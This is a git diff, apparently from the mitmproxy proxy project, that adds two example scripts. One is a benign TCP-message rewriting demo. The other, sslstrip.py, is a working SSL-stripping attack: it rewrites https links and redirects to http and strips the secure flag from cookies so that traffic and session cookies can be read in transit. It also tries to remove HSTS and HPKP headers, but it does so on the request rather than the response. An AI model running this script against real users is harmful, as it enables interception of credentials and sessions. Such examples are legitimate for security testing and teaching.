diff options
Diffstat (limited to 'examples')
| -rw-r--r-- | examples/sslstrip.py | 40 | ||||
| -rw-r--r-- | examples/tcp_message.py | 24 |
2 files changed, 64 insertions, 0 deletions
diff --git a/examples/sslstrip.py b/examples/sslstrip.py new file mode 100644 index 00000000..369427a2 --- /dev/null +++ b/examples/sslstrip.py @@ -0,0 +1,40 @@ +from netlib.http import decoded +import re +from six.moves import urllib + +def start(context, argv) : + + #set of SSL/TLS capable hosts + context.secure_hosts = set() + +def request(context, flow) : + + flow.request.headers.pop('If-Modified-Since', None) + flow.request.headers.pop('Cache-Control', None) + + #proxy connections to SSL-enabled hosts + if flow.request.pretty_host in context.secure_hosts : + flow.request.scheme = 'https' + flow.request.port = 443 + +def response(context, flow) : + + with decoded(flow.response) : + flow.request.headers.pop('Strict-Transport-Security', None) + flow.request.headers.pop('Public-Key-Pins', None) + + #strip links in response body + flow.response.content = flow.response.content.replace('https://', 'http://') + + #strip links in 'Location' header + if flow.response.headers.get('Location','').startswith('https://'): + location = flow.response.headers['Location'] + hostname = urllib.parse.urlparse(location).hostname + if hostname: + context.secure_hosts.add(hostname) + flow.response.headers['Location'] = location.replace('https://', 'http://', 1) + + #strip secure flag from 'Set-Cookie' headers + cookies = flow.response.headers.get_all('Set-Cookie') + cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies] + flow.response.headers.set_all('Set-Cookie', cookies) diff --git a/examples/tcp_message.py b/examples/tcp_message.py new file mode 100644 index 00000000..c63368e4 --- /dev/null +++ b/examples/tcp_message.py @@ -0,0 +1,24 @@ +''' +tcp_message Inline Script Hook API Demonstration +------------------------------------------------ + +* modifies packets containing "foo" to "bar" +* prints various details for each packet. + +example cmdline invocation: +mitmdump -T --host --tcp ".*" -q -s examples/tcp_message.py +''' +from netlib.utils import clean_bin + +def tcp_message(ctx, tcp_msg): + modified_msg = tcp_msg.message.replace("foo", "bar") + + is_modified = False if modified_msg == tcp_msg.message else True + tcp_msg.message = modified_msg + + print("[tcp_message{}] from {} {} to {} {}:\r\n{}".format( + " (modified)" if is_modified else "", + "client" if tcp_msg.sender == tcp_msg.client_conn else "server", + tcp_msg.sender.address, + "server" if tcp_msg.receiver == tcp_msg.server_conn else "client", + tcp_msg.receiver.address, clean_bin(tcp_msg.message))) |